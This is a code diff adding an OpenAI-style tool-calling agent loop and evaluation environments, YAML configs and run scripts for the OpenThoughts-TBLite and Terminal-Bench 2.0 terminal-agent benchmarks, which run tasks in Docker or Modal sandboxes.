            valid_tool_names: Set of tool names the model is allowed to call
            max_turns: Maximum number of LLM calls before stopping
            task_id: Unique ID for terminal/browser session isolation
            temperature: Sampling temperature for generation
            max_tokens: Max tokens per generation (None for server default)
            extra_body: Extra parameters passed to the OpenAI client's create() call.
                Used for OpenRouter provider preferences, transforms, etc.
                e.g. {"provider": {"ignore": ["DeepInfra"]}}
        """
        self.server = server
        self.tool_schemas = tool_schemas
        self.valid_tool_names = valid_tool_names
        self.max_turns = max_turns
        self.task_id = task_id or str(uuid.uuid4())
        self.temperature = temperature
        self.max_tokens = max_tokens
        self.extra_body = extra_body
    async def run(self, messages: List[Dict[str, Any]]) -> AgentResult:
        """
        Execute the full agent loop using standard OpenAI tool calling.

        Args:
            messages: Initial conversation messages (system + user).
                Modified in-place as the conversation progresses.

        Returns:
            AgentResult with full conversation history, managed state, and metadata
        """
        reasoning_per_turn = []
        tool_errors: List[ToolError] = []

        # Per-loop TodoStore for the todo tool (ephemeral, dies with the loop)
        from tools.todo_tool import TodoStore, todo_tool as _todo_tool

        _todo_store = TodoStore()

        # Extract user task from first user message for browser_snapshot context
        _user_task = None
        for msg in messages:
            if msg.get("role") == "user":
                content = msg.get("content", "")
                if isinstance(content, str) and content.strip():
                    _user_task = content.strip()[:500]  # Cap to avoid huge strings
                break

        import time as _time
        for turn in range(self.max_turns):
            turn_start = _time.monotonic()

            # Build the chat_completion kwargs
            chat_kwargs = {
                "messages": messages,
                "n": 1,
                "temperature": self.temperature,
            }
            # Only pass tools if we have them
            if self.tool_schemas:
                chat_kwargs["tools"] = self.tool_schemas
            # Only pass max_tokens if explicitly set
            if self.max_tokens is not None:
                chat_kwargs["max_tokens"] = self.max_tokens
            # Inject extra_body for provider-specific params (e.g., OpenRouter
            # provider preferences like banned/preferred providers, transforms)
            if self.extra_body:
                chat_kwargs["extra_body"] = self.extra_body

            # Make the API call -- standard OpenAI spec
            api_start = _time.monotonic()
            try:
                response = await self.server.chat_completion(**chat_kwargs)
            except Exception as e:
                api_elapsed = _time.monotonic() - api_start
                logger.error("API call failed on turn %d (%.1fs): %s", turn + 1, api_elapsed, e)
                return AgentResult(
                    messages=messages,
                    managed_state=self._get_managed_state(),
                    turns_used=turn + 1,
                    finished_naturally=False,
                    reasoning_per_turn=reasoning_per_turn,
                    tool_errors=tool_errors,
                )
            api_elapsed = _time.monotonic() - api_start

            if not response or not response.choices:
                logger.warning("Empty response on turn %d (api=%.1fs)", turn + 1, api_elapsed)
                return AgentResult(
                    messages=messages,
                    managed_state=self._get_managed_state(),
                    turns_used=turn + 1,
                    finished_naturally=False,
                    reasoning_per_turn=reasoning_per_turn,
                    tool_errors=tool_errors,
                )

            assistant_msg = response.choices[0].message

            # Extract reasoning content from the response (all provider formats)
            reasoning = _extract_reasoning_from_message(assistant_msg)
            reasoning_per_turn.append(reasoning)

            # Check for tool calls -- standard OpenAI spec.
            # Fallback: if response has no structured tool_calls but content
            # contains raw tool call tags (e.g. <tool_call>), parse them using
            # hermes-agent's standalone parsers. This handles the case where
            # ManagedServer's ToolCallTranslator couldn't parse because vLLM
            # isn't installed.
            if (
                not assistant_msg.tool_calls
                and assistant_msg.content
                and self.tool_schemas
                and "<tool_call>" in (assistant_msg.content or "")
            ):
                try:
                    from environments.tool_call_parsers import get_parser

                    fallback_parser = get_parser("hermes")
                    parsed_content, parsed_calls = fallback_parser.parse(
                        assistant_msg.content
                    )
                    if parsed_calls:
                        assistant_msg.tool_calls = parsed_calls
                        if parsed_content is not None:
                            assistant_msg.content = parsed_content
                        logger.debug(
                            "Fallback parser extracted %d tool calls from raw content",
                            len(parsed_calls),
                        )
                except Exception:
                    pass  # Fall through to no tool calls
            if assistant_msg.tool_calls:
                # Normalize tool calls to dicts — they may come as objects
                # (OpenAI API) or dicts (vLLM ToolCallTranslator).
                def _tc_to_dict(tc):
                    if isinstance(tc, dict):
                        return {
                            "id": tc.get("id", f"call_{uuid.uuid4().hex[:8]}"),
                            "type": "function",
                            "function": {
                                "name": tc.get("function", {}).get("name", tc.get("name", "")),
                                "arguments": tc.get("function", {}).get("arguments", tc.get("arguments", "{}")),
                            },
                        }
                    return {
                        "id": tc.id,
                        "type": "function",
                        "function": {
                            "name": tc.function.name,
                            "arguments": tc.function.arguments,
                        },
                    }

                # Build the assistant message dict for conversation history
                msg_dict: Dict[str, Any] = {
                    "role": "assistant",
                    "content": assistant_msg.content or "",
                    "tool_calls": [_tc_to_dict(tc) for tc in assistant_msg.tool_calls],
                }
                # Preserve reasoning_content for multi-turn chat template handling
                # (e.g., Kimi-K2's template renders <think> blocks differently
                # for history vs. the latest turn based on this field)
                if reasoning:
                    msg_dict["reasoning_content"] = reasoning
                messages.append(msg_dict)
                # Execute each tool call via hermes-agent's dispatch
                for tc in assistant_msg.tool_calls:
                    # Handle both object (OpenAI) and dict (vLLM) formats
                    if isinstance(tc, dict):
                        tool_name = tc.get("function", {}).get("name", tc.get("name", ""))
                        tool_args_raw = tc.get("function", {}).get("arguments", tc.get("arguments", "{}"))
                    else:
                        tool_name = tc.function.name
                        tool_args_raw = tc.function.arguments

                    # Validate tool name
                    if tool_name not in self.valid_tool_names:
                        tool_result = json.dumps(
                            {
                                "error": f"Unknown tool '{tool_name}'. "
                                f"Available tools: {sorted(self.valid_tool_names)}"
                            }
                        )
                        tool_errors.append(ToolError(
                            turn=turn + 1, tool_name=tool_name,
                            arguments=tool_args_raw[:200],
                            error=f"Unknown tool '{tool_name}'",
                            tool_result=tool_result,
                        ))
                        logger.warning(
                            "Model called unknown tool '%s' on turn %d",
                            tool_name, turn + 1,
                        )
                    else:
                        # Parse arguments and dispatch
                        try:
                            args = json.loads(tool_args_raw)
                        except json.JSONDecodeError:
                            args = {}
                            logger.warning(
                                "Invalid JSON in tool call arguments for '%s': %s",
                                tool_name, tool_args_raw[:200],
                            )
                        try:
                            if tool_name == "terminal":
                                backend = os.getenv("TERMINAL_ENV", "local")
                                cmd_preview = args.get("command", "")[:80]
                                logger.info(
                                    "[%s] $ %s", self.task_id[:8], cmd_preview,
                                )
                            tool_submit_time = _time.monotonic()
                            # Todo tool -- handle locally (needs per-loop TodoStore)
                            if tool_name == "todo":
                                tool_result = _todo_tool(
                                    todos=args.get("todos"),
                                    merge=args.get("merge", False),
                                    store=_todo_store,
                                )
                                tool_elapsed = _time.monotonic() - tool_submit_time
                            elif tool_name == "memory":
                                tool_result = json.dumps({"error": "Memory is not available in RL environments."})
                                tool_elapsed = _time.monotonic() - tool_submit_time
                            elif tool_name == "session_search":
                                tool_result = json.dumps({"error": "Session search is not available in RL environments."})
                                tool_elapsed = _time.monotonic() - tool_submit_time
                            else:
                                # Run tool calls in a thread pool so backends that
                                # use asyncio.run() internally (modal, docker, daytona) get
                                # a clean event loop instead of deadlocking.
                                loop = asyncio.get_event_loop()
                                # Capture current tool_name/args for the lambda
                                _tn, _ta, _tid = tool_name, args, self.task_id
                                tool_result = await loop.run_in_executor(
                                    _tool_executor,
                                    lambda: handle_function_call(
                                        _tn, _ta, task_id=_tid,
                                        user_task=_user_task,
                                    ),
                                )
                                tool_elapsed = _time.monotonic() - tool_submit_time

                            # Log slow tools and thread pool stats for debugging
                            pool_active = _tool_executor._work_queue.qsize()
                            if tool_elapsed > 30:
                                logger.warning(
                                    "[%s] turn %d: %s took %.1fs (pool queue=%d)",
                                    self.task_id[:8], turn + 1, tool_name,
                                    tool_elapsed, pool_active,
                                )
                        except Exception as e:
                            tool_result = json.dumps(
                                {"error": f"Tool execution failed: {type(e).__name__}: {str(e)}"}
                            )
                            tool_errors.append(ToolError(
                                turn=turn + 1, tool_name=tool_name,
                                arguments=tool_args_raw[:200],
                                error=f"{type(e).__name__}: {str(e)}",
                                tool_result=tool_result,
                            ))
                            logger.error(
                                "Tool '%s' execution failed on turn %d: %s",
                                tool_name, turn + 1, e,
                            )

                        # Also check if the tool returned an error in its JSON result
                        try:
                            result_data = json.loads(tool_result)
                            if isinstance(result_data, dict):
                                err = result_data.get("error")
                                exit_code = result_data.get("exit_code")
                                if err and exit_code and exit_code < 0:
                                    tool_errors.append(ToolError(
                                        turn=turn + 1, tool_name=tool_name,
                                        arguments=tool_args_raw[:200],
                                        error=str(err),
                                        tool_result=tool_result[:500],
                                    ))
                        except (json.JSONDecodeError, TypeError):
                            pass
                    # Add tool response to conversation
                    tc_id = tc.get("id", "") if isinstance(tc, dict) else tc.id
                    messages.append(
                        {
                            "role": "tool",
                            "tool_call_id": tc_id,
                            "content": tool_result,
                        }
                    )

                turn_elapsed = _time.monotonic() - turn_start
                logger.info(
                    "[%s] turn %d: api=%.1fs, %d tools, turn_total=%.1fs",
                    self.task_id[:8], turn + 1, api_elapsed,
                    len(assistant_msg.tool_calls), turn_elapsed,
                )
            else:
                # No tool calls -- model is done
                msg_dict = {
                    "role": "assistant",
                    "content": assistant_msg.content or "",
                }
                if reasoning:
                    msg_dict["reasoning_content"] = reasoning
                messages.append(msg_dict)
                turn_elapsed = _time.monotonic() - turn_start
                logger.info(
                    "[%s] turn %d: api=%.1fs, no tools (finished), turn_total=%.1fs",
                    self.task_id[:8], turn + 1, api_elapsed, turn_elapsed,
                )
                return AgentResult(
                    messages=messages,
                    managed_state=self._get_managed_state(),
                    turns_used=turn + 1,
                    finished_naturally=True,
                    reasoning_per_turn=reasoning_per_turn,
                    tool_errors=tool_errors,
                )
        # Hit max turns without the model stopping
        logger.info("Agent hit max_turns (%d) without finishing", self.max_turns)
        return AgentResult(
            messages=messages,
            managed_state=self._get_managed_state(),
            turns_used=self.max_turns,
            finished_naturally=False,
            reasoning_per_turn=reasoning_per_turn,
            tool_errors=tool_errors,
        )
    def _get_managed_state(self) -> Optional[Dict[str, Any]]:
        """
        Get ManagedServer state if the server supports it.

        Returns state dict with SequenceNodes containing tokens/logprobs/masks,
        or None if the server doesn't support get_state() (e.g., regular OpenAI server).
        """
        if hasattr(self.server, "get_state"):
            return self.server.get_state()
        return None

File diff suppressed because it is too large

environments/benchmarks/tblite/README.md

@@ -0,0 +1,73 @@
# OpenThoughts-TBLite Evaluation Environment
This environment evaluates terminal agents on the [OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite) benchmark, a difficulty-calibrated subset of [Terminal-Bench 2.0](https://www.tbench.ai/leaderboard/terminal-bench/2.0).
## Source
OpenThoughts-TBLite was created by the [OpenThoughts](https://www.openthoughts.ai/) Agent team in collaboration with [Snorkel AI](https://snorkel.ai/) and [Bespoke Labs](https://bespokelabs.ai/). The original dataset and documentation live at:
- **Dataset (source):** [open-thoughts/OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite)
- **GitHub:** [open-thoughts/OpenThoughts-TBLite](https://github.com/open-thoughts/OpenThoughts-TBLite)
- **Blog post:** [openthoughts.ai/blog/openthoughts-tblite](https://www.openthoughts.ai/blog/openthoughts-tblite)
## Our Dataset
We converted the source into the same schema used by our Terminal-Bench 2.0 environment (pre-built Docker Hub images, base64-encoded test tarballs, etc.) and published it as:
- **Dataset (ours):** [NousResearch/openthoughts-tblite](https://huggingface.co/datasets/NousResearch/openthoughts-tblite)
- **Docker images:** `nousresearch/tblite-<task-name>:latest` on Docker Hub (100 images)
The conversion script is at `scripts/prepare_tblite_dataset.py`.
## Why TBLite?
Terminal-Bench 2.0 is one of the strongest frontier evaluations for terminal agents, but when a model scores near the floor (e.g., Qwen 3 8B at <1%), many changes look identical in aggregate score. TBLite addresses this by calibrating task difficulty using Claude Haiku 4.5 as a reference:
| Difficulty | Pass Rate Range | Tasks |
|------------|----------------|-------|
| Easy | >= 70% | 40 |
| Medium | 40-69% | 26 |
| Hard | 10-39% | 26 |
| Extreme | < 10% | 8 |
This gives enough solvable tasks to detect small improvements quickly, while preserving enough hard tasks to avoid saturation. The correlation between TBLite and TB2 scores is **r = 0.911**.
TBLite also runs 2.6-8x faster than the full TB2, making it practical for iteration loops.
## Usage
```bash
# Run the full benchmark
python environments/benchmarks/tblite/tblite_env.py evaluate

# Filter to specific tasks
python environments/benchmarks/tblite/tblite_env.py evaluate \
    --env.task_filter "broken-python,pandas-etl"

# Use a different model
python environments/benchmarks/tblite/tblite_env.py evaluate \
    --server.model_name "qwen/qwen3-30b"
```
## Architecture
`TBLiteEvalEnv` is a thin subclass of `TerminalBench2EvalEnv`. All evaluation logic (agent loop, Docker sandbox management, test verification, metrics) is inherited. Only the defaults differ:
| Setting | TB2 | TBLite |
|----------------|----------------------------------|-----------------------------------------|
| Dataset | `NousResearch/terminal-bench-2` | `NousResearch/openthoughts-tblite` |
| Tasks | 89 | 100 |
| Task timeout | 1800s (30 min) | 1200s (20 min) |
| Wandb name | `terminal-bench-2` | `openthoughts-tblite` |
## Citation
```bibtex
@software{OpenThoughts-TBLite,
  author       = {OpenThoughts-Agent team, Snorkel AI, Bespoke Labs},
  month        = Feb,
  title        = {{OpenThoughts-TBLite: A High-Signal Benchmark for Iterating on Terminal Agents}},
  howpublished = {https://www.openthoughts.ai/blog/openthoughts-tblite},
  year         = {2026}
}
```

environments/benchmarks/tblite/default.yaml

@@ -0,0 +1,39 @@
# OpenThoughts-TBLite Evaluation -- Default Configuration
#
# Eval-only environment for the TBLite benchmark (100 difficulty-calibrated
# terminal tasks, a faster proxy for Terminal-Bench 2.0).
# Uses Modal terminal backend for per-task cloud-isolated sandboxes
# and OpenRouter for inference.
#
# Usage:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/default.yaml
#
# # Override model:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/default.yaml \
# --openai.model_name anthropic/claude-sonnet-4
env:
  enabled_toolsets: ["terminal", "file"]
  max_agent_turns: 60
  max_token_length: 32000
  agent_temperature: 0.8
  terminal_backend: "modal"
  terminal_timeout: 300   # 5 min per command (builds, pip install)
  tool_pool_size: 128     # thread pool for 100 parallel tasks
  dataset_name: "NousResearch/openthoughts-tblite"
  test_timeout: 600
  task_timeout: 1200      # 20 min wall-clock per task (TBLite tasks are faster)
  tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
  use_wandb: true
  wandb_name: "openthoughts-tblite"
  ensure_scores_are_not_same: false
  data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite"

openai:
  base_url: "https://openrouter.ai/api/v1"
  model_name: "anthropic/claude-opus-4.6"
  server_type: "openai"
  health_check: false
  # api_key loaded from OPENROUTER_API_KEY in .env

environments/benchmarks/tblite/local.yaml

@@ -0,0 +1,38 @@
# OpenThoughts-TBLite Evaluation -- Docker Backend (Local Compute)
#
# Runs tasks in Docker containers on the local machine.
# Sandboxed like Modal but no cloud costs. Good for dev/testing.
#
# Usage:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/local.yaml
#
# # Override concurrency:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/local.yaml \
# --env.eval_concurrency 4
env:
  enabled_toolsets: ["terminal", "file"]
  max_agent_turns: 60
  max_token_length: 32000
  agent_temperature: 0.8
  terminal_backend: "docker"
  terminal_timeout: 300
  tool_pool_size: 16
  dataset_name: "NousResearch/openthoughts-tblite"
  test_timeout: 600
  task_timeout: 1200
  eval_concurrency: 8     # max 8 tasks at once
  tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
  use_wandb: false
  wandb_name: "openthoughts-tblite-local"
  ensure_scores_are_not_same: false
  data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite-local"

openai:
  base_url: "https://openrouter.ai/api/v1"
  model_name: "anthropic/claude-sonnet-4"
  server_type: "openai"
  health_check: false
  # api_key loaded from OPENROUTER_API_KEY in .env

environments/benchmarks/tblite/local_vllm.yaml

@@ -0,0 +1,40 @@
# OpenThoughts-TBLite Evaluation -- Local vLLM Backend
#
# Runs against a local vLLM server with Docker sandboxes.
#
# Start the vLLM server from the atropos directory:
# python -m example_trainer.vllm_api_server \
# --model Qwen/Qwen3-4B-Instruct-2507 \
# --port 9001 \
# --gpu-memory-utilization 0.8 \
# --max-model-len=32000
#
# Then run:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/local_vllm.yaml
env:
  enabled_toolsets: ["terminal", "file"]
  max_agent_turns: 60
  max_token_length: 16000
  agent_temperature: 0.6
  terminal_backend: "docker"
  terminal_timeout: 300
  tool_pool_size: 16
  dataset_name: "NousResearch/openthoughts-tblite"
  test_timeout: 600
  task_timeout: 1200
  eval_concurrency: 8
  tool_call_parser: "hermes"
  system_prompt: "You are an expert terminal agent. You MUST use the provided tools to complete tasks. Use the terminal tool to run shell commands, read_file to read files, write_file to write files, search_files to search, and patch to edit files. Do NOT write out solutions as text - execute them using the tools. Always start by exploring the environment with terminal commands."
  tokenizer_name: "Qwen/Qwen3-4B-Instruct-2507"
  use_wandb: false
  wandb_name: "tblite-qwen3-4b-instruct"
  ensure_scores_are_not_same: false
  data_dir_to_save_evals: "environments/benchmarks/evals/tblite-qwen3-4b-local"

openai:
  base_url: "http://localhost:9001"
  model_name: "Qwen/Qwen3-4B-Instruct-2507"
  server_type: "vllm"
  health_check: false

environments/benchmarks/tblite/run_eval.sh

@@ -0,0 +1,42 @@
#!/bin/bash
# OpenThoughts-TBLite Evaluation
#
# Run from repo root:
# bash environments/benchmarks/tblite/run_eval.sh
#
# Override model:
# bash environments/benchmarks/tblite/run_eval.sh \
# --openai.model_name anthropic/claude-sonnet-4
#
# Run a subset:
# bash environments/benchmarks/tblite/run_eval.sh \
# --env.task_filter broken-python,pandas-etl
#
# All terminal settings (backend, timeout, lifetime, pool size) are
# configured via env config fields -- no env vars needed.
set -euo pipefail
mkdir -p logs evals/openthoughts-tblite
LOG_FILE="logs/tblite_$(date +%Y%m%d_%H%M%S).log"
echo "OpenThoughts-TBLite Evaluation"
echo "Log file: $LOG_FILE"
echo ""
# Unbuffered python output so logs are written in real-time
export PYTHONUNBUFFERED=1
# Show INFO-level agent loop timing (api/tool durations per turn)
# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
export LOGLEVEL=INFO
python tblite_env.py evaluate \
    --config default.yaml \
    "$@" \
    2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"
echo "Eval results: evals/openthoughts-tblite/"

environments/benchmarks/tblite/tblite_env.py

@@ -0,0 +1,119 @@
"""
OpenThoughts-TBLite Evaluation Environment
A lighter, faster alternative to Terminal-Bench 2.0 for iterating on terminal
agents. Uses the same evaluation logic as TerminalBench2EvalEnv but defaults
to the NousResearch/openthoughts-tblite dataset (100 difficulty-calibrated
tasks vs TB2's 89 harder tasks).
TBLite tasks are a curated subset of TB2 with a difficulty distribution
designed to give meaningful signal even for smaller models:
- Easy (40 tasks): >= 70% pass rate with Claude Haiku 4.5
- Medium (26 tasks): 40-69% pass rate
- Hard (26 tasks): 10-39% pass rate
- Extreme (8 tasks): < 10% pass rate
Usage:
    python environments/benchmarks/tblite/tblite_env.py evaluate

    # Filter to specific tasks:
    python environments/benchmarks/tblite/tblite_env.py evaluate \\
        --env.task_filter "broken-python,pandas-etl"
"""
import os
import sys
from pathlib import Path
from typing import List, Tuple
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
    sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.benchmarks.terminalbench_2.terminalbench2_env import (
TerminalBench2EvalConfig,
TerminalBench2EvalEnv,
)
class TBLiteEvalConfig(TerminalBench2EvalConfig):
    """Configuration for the OpenThoughts-TBLite evaluation environment.

    Inherits all TB2 config fields. Only the dataset default and task timeout
    differ -- TBLite tasks are calibrated to be faster.
    """

    dataset_name: str = Field(
        default="NousResearch/openthoughts-tblite",
        description="HuggingFace dataset containing TBLite tasks.",
    )
    task_timeout: int = Field(
        default=1200,
        description="Maximum wall-clock seconds per task. TBLite tasks are "
        "generally faster than TB2, so 20 minutes is usually sufficient.",
    )
class TBLiteEvalEnv(TerminalBench2EvalEnv):
    """OpenThoughts-TBLite evaluation environment.

    Inherits all evaluation logic from TerminalBench2EvalEnv (agent loop,
    test verification, Docker image resolution, metrics, wandb logging).
    Only the default configuration differs.
    """

    name = "openthoughts-tblite"
    env_config_cls = TBLiteEvalConfig

    @classmethod
    def config_init(cls) -> Tuple[TBLiteEvalConfig, List[APIServerConfig]]:
        env_config = TBLiteEvalConfig(
            enabled_toolsets=["terminal", "file"],
            disabled_toolsets=None,
            distribution=None,
            max_agent_turns=60,
            max_token_length=16000,
            agent_temperature=0.6,
            system_prompt=None,
            terminal_backend="modal",
            terminal_timeout=300,
            test_timeout=180,
            # 100 tasks in parallel
            tool_pool_size=128,
            eval_handling=EvalHandlingEnum.STOP_TRAIN,
            group_size=1,
            steps_per_eval=1,
            total_steps=1,
            tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
            use_wandb=True,
            wandb_name="openthoughts-tblite",
            ensure_scores_are_not_same=False,
        )
        server_configs = [
            APIServerConfig(
                base_url="https://openrouter.ai/api/v1",
                model_name="anthropic/claude-sonnet-4",
                server_type="openai",
                api_key=os.getenv("OPENROUTER_API_KEY", ""),
                health_check=False,
            )
        ]
        return env_config, server_configs


if __name__ == "__main__":
    TBLiteEvalEnv.cli()

environments/benchmarks/terminalbench_2/default.yaml

@@ -0,0 +1,42 @@
# Terminal-Bench 2.0 Evaluation -- Default Configuration
#
# Eval-only environment for the TB2 benchmark (89 terminal tasks).
# Uses Modal terminal backend for per-task cloud-isolated sandboxes
# and OpenRouter for inference.
#
# Usage:
# python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
# --config environments/benchmarks/terminalbench_2/default.yaml
#
# # Override model:
# python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
# --config environments/benchmarks/terminalbench_2/default.yaml \
# --openai.model_name anthropic/claude-sonnet-4
env:
  enabled_toolsets: ["terminal", "file"]
  max_agent_turns: 60
  max_token_length: 32000
  agent_temperature: 0.8
  terminal_backend: "modal"
  terminal_timeout: 300   # 5 min per command (builds, pip install)
  tool_pool_size: 128     # thread pool for 89 parallel tasks
  dataset_name: "NousResearch/terminal-bench-2"
  test_timeout: 600
  task_timeout: 1800      # 30 min wall-clock per task, auto-FAIL if exceeded
  tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
  use_wandb: true
  wandb_name: "terminal-bench-2"
  ensure_scores_are_not_same: false
  data_dir_to_save_evals: "environments/benchmarks/evals/terminal-bench-2"
  # CRITICAL: Limit concurrent Modal sandbox creations to avoid deadlocks.
  # Modal's blocking calls (App.lookup, etc.) deadlock when too many sandboxes
  # are created simultaneously inside thread pool workers via asyncio.run().
  max_concurrent_tasks: 8

openai:
  base_url: "https://openrouter.ai/api/v1"
  model_name: "anthropic/claude-opus-4.6"
  server_type: "openai"
  health_check: false
  # api_key loaded from OPENROUTER_API_KEY in .env

environments/benchmarks/terminalbench_2/run_eval.sh

@@ -0,0 +1,42 @@
#!/bin/bash
# Terminal-Bench 2.0 Evaluation
#
# Run from repo root:
# bash environments/benchmarks/terminalbench_2/run_eval.sh
#
# Override model:
# bash environments/benchmarks/terminalbench_2/run_eval.sh \
# --openai.model_name anthropic/claude-sonnet-4
#
# Run a subset:
# bash environments/benchmarks/terminalbench_2/run_eval.sh \
# --env.task_filter fix-git,git-multibranch
#
# All terminal settings (backend, timeout, lifetime, pool size) are
# configured via env config fields -- no env vars needed.
set -euo pipefail
mkdir -p logs evals/terminal-bench-2
LOG_FILE="logs/terminalbench2_$(date +%Y%m%d_%H%M%S).log"
echo "Terminal-Bench 2.0 Evaluation"
echo "Log file: $LOG_FILE"
echo ""
# Unbuffered python output so logs are written in real-time
export PYTHONUNBUFFERED=1
# Show INFO-level agent loop timing (api/tool durations per turn)
# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
export LOGLEVEL=INFO
python terminalbench2_env.py evaluate \
    --config default.yaml \
    "$@" \
    2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"
echo "Eval results: evals/terminal-bench-2/"

environments/benchmarks/terminalbench_2/terminalbench2_env.py

@@ -0,0 +1,515 @@
"""
TerminalBench2Env -- Terminal-Bench 2.0 Evaluation Environment
Evaluates agentic LLMs on challenging terminal tasks from Terminal-Bench 2.0.
Each task provides a unique Docker environment (pre-built on Docker Hub), a natural
language instruction, and a test suite for verification. The agent uses terminal +
file tools to complete the task, then the test suite runs inside the same sandbox.
This is an eval-only environment (not a training environment). It is designed to
be run via the `evaluate` subcommand:

    python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \\
        --env.dataset_name NousResearch/terminal-bench-2

The evaluate flow:
1. setup() -- Loads the TB2 dataset from HuggingFace
2. evaluate() -- Iterates over all tasks, running each through:
   a. rollout_and_score_eval() -- Per-task agent loop + test verification
      - Resolves Docker image (pre-built Hub image or Dockerfile fallback)
      - Registers per-task Modal sandbox via register_task_env_overrides()
      - Runs the HermesAgentLoop (terminal + file tools)
      - Uploads test suite and runs test.sh in the same sandbox
      - Returns binary pass/fail result
   b. Aggregates per-task, per-category, and overall pass rates
   c. Logs results via evaluate_log() and wandb
Key features:
- Per-task Modal sandboxes using pre-built Docker Hub images
- Binary reward: 1.0 if all tests pass, 0.0 otherwise
- Concurrency-controlled parallel evaluation via asyncio.Semaphore
- Per-task, per-category, and aggregate pass rate tracking
"""
import asyncio
import base64
import io
import json
import logging
import os
import shutil
import sys
import tarfile
import tempfile
import time
import uuid
from collections import defaultdict
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
# Ensure repo root is on sys.path for imports
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
    sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.agent_loop import AgentResult, HermesAgentLoop
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.tool_context import ToolContext
from tools.terminal_tool import (
    register_task_env_overrides,
    clear_task_env_overrides,
    cleanup_vm,
)
logger = logging.getLogger(__name__)
# =============================================================================
# Configuration
# =============================================================================
class TerminalBench2EvalConfig(HermesAgentEnvConfig):
    """
    Configuration for the Terminal-Bench 2.0 evaluation environment.

    Extends HermesAgentEnvConfig with TB2-specific settings for dataset loading,
    test execution, task filtering, and eval concurrency.
    """

    # --- Dataset ---
    dataset_name: str = Field(
        default="NousResearch/terminal-bench-2",
        description="HuggingFace dataset containing TB2 tasks.",
    )
    # --- Test execution ---
    test_timeout: int = Field(
        default=180,
        description="Timeout in seconds for running the test suite after agent completes.",
    )
    # --- Image strategy ---
    force_build: bool = Field(
        default=False,
        description="If True, always build from Dockerfile (ignore docker_image). "
        "Useful for testing custom Dockerfiles.",
    )
    # --- Task filtering (comma-separated from CLI) ---
    task_filter: Optional[str] = Field(
        default=None,
        description="Comma-separated task names to run (e.g., 'fix-git,git-multibranch'). "
        "If not set, all tasks are run.",
    )
    skip_tasks: Optional[str] = Field(
        default=None,
        description="Comma-separated task names to skip on top of the default skip list.",
    )
    # --- Per-task wall-clock timeout ---
    task_timeout: int = Field(
        default=1800,
        description="Maximum wall-clock seconds per task (agent loop + verification). "
        "Tasks exceeding this are scored as FAIL. Default 30 minutes.",
    )
    # --- Concurrency control ---
    max_concurrent_tasks: int = Field(
        default=8,
        description="Maximum number of tasks to run concurrently. "
        "Limits concurrent Modal sandbox creations to avoid async/threading deadlocks. "
        "Modal has internal limits and creating too many sandboxes simultaneously "
        "causes blocking calls to deadlock inside the thread pool.",
    )
    # --- Eval concurrency ---
    eval_concurrency: int = Field(
        default=0,
        description="Maximum number of tasks to evaluate in parallel. "
        "0 means unlimited (all tasks run concurrently). "
        "Set to 8 for local backends to avoid overwhelming the machine.",
    )
# Tasks that cannot run properly on Modal and are excluded from scoring.
MODAL_INCOMPATIBLE_TASKS = {
    "qemu-startup",     # Needs KVM/hardware virtualization
    "qemu-alpine-ssh",  # Needs KVM/hardware virtualization
    "crack-7z-hash",    # Password brute-force -- too slow for cloud sandbox timeouts
}
# =============================================================================
# Tar extraction helper
# =============================================================================
def _extract_base64_tar(b64_data: str, target_dir: Path):
    """Extract a base64-encoded tar.gz archive into target_dir."""
    if not b64_data:
        return
    raw = base64.b64decode(b64_data)
    buf = io.BytesIO(raw)
    with tarfile.open(fileobj=buf, mode="r:gz") as tar:
        tar.extractall(path=str(target_dir))
# =============================================================================
# Main Environment
# =============================================================================
class TerminalBench2EvalEnv(HermesAgentBaseEnv):
"""
Terminal-Bench 2.0 evaluation environment (eval-only, no training).
Inherits from HermesAgentBaseEnv for:
- Terminal backend setup (os.environ["TERMINAL_ENV"])
- Tool resolution via _resolve_tools_for_group()
- Monkey patches for async-safe tool operation
- Wandb trajectory formatting
The evaluate flow (triggered by `environment.py evaluate`):
1. setup() -- Load dataset from HuggingFace
2. evaluate() -- Run all tasks through rollout_and_score_eval()
Each task in rollout_and_score_eval():
1. Resolve Docker image (pre-built Hub image or Dockerfile fallback)
2. Register per-task Modal sandbox override
3. Run HermesAgentLoop with terminal + file tools
4. Upload test suite and execute test.sh in the same sandbox
5. Check /logs/verifier/reward.txt for pass/fail
6. Clean up sandbox, overrides, and temp files
"""
name = "terminal-bench-2"
env_config_cls = TerminalBench2EvalConfig
@classmethod
def config_init(cls) -> Tuple[TerminalBench2EvalConfig, List[APIServerConfig]]:
"""
Default configuration for Terminal-Bench 2.0 evaluation.
Uses eval-only settings:
- eval_handling=STOP_TRAIN so the eval flow runs cleanly
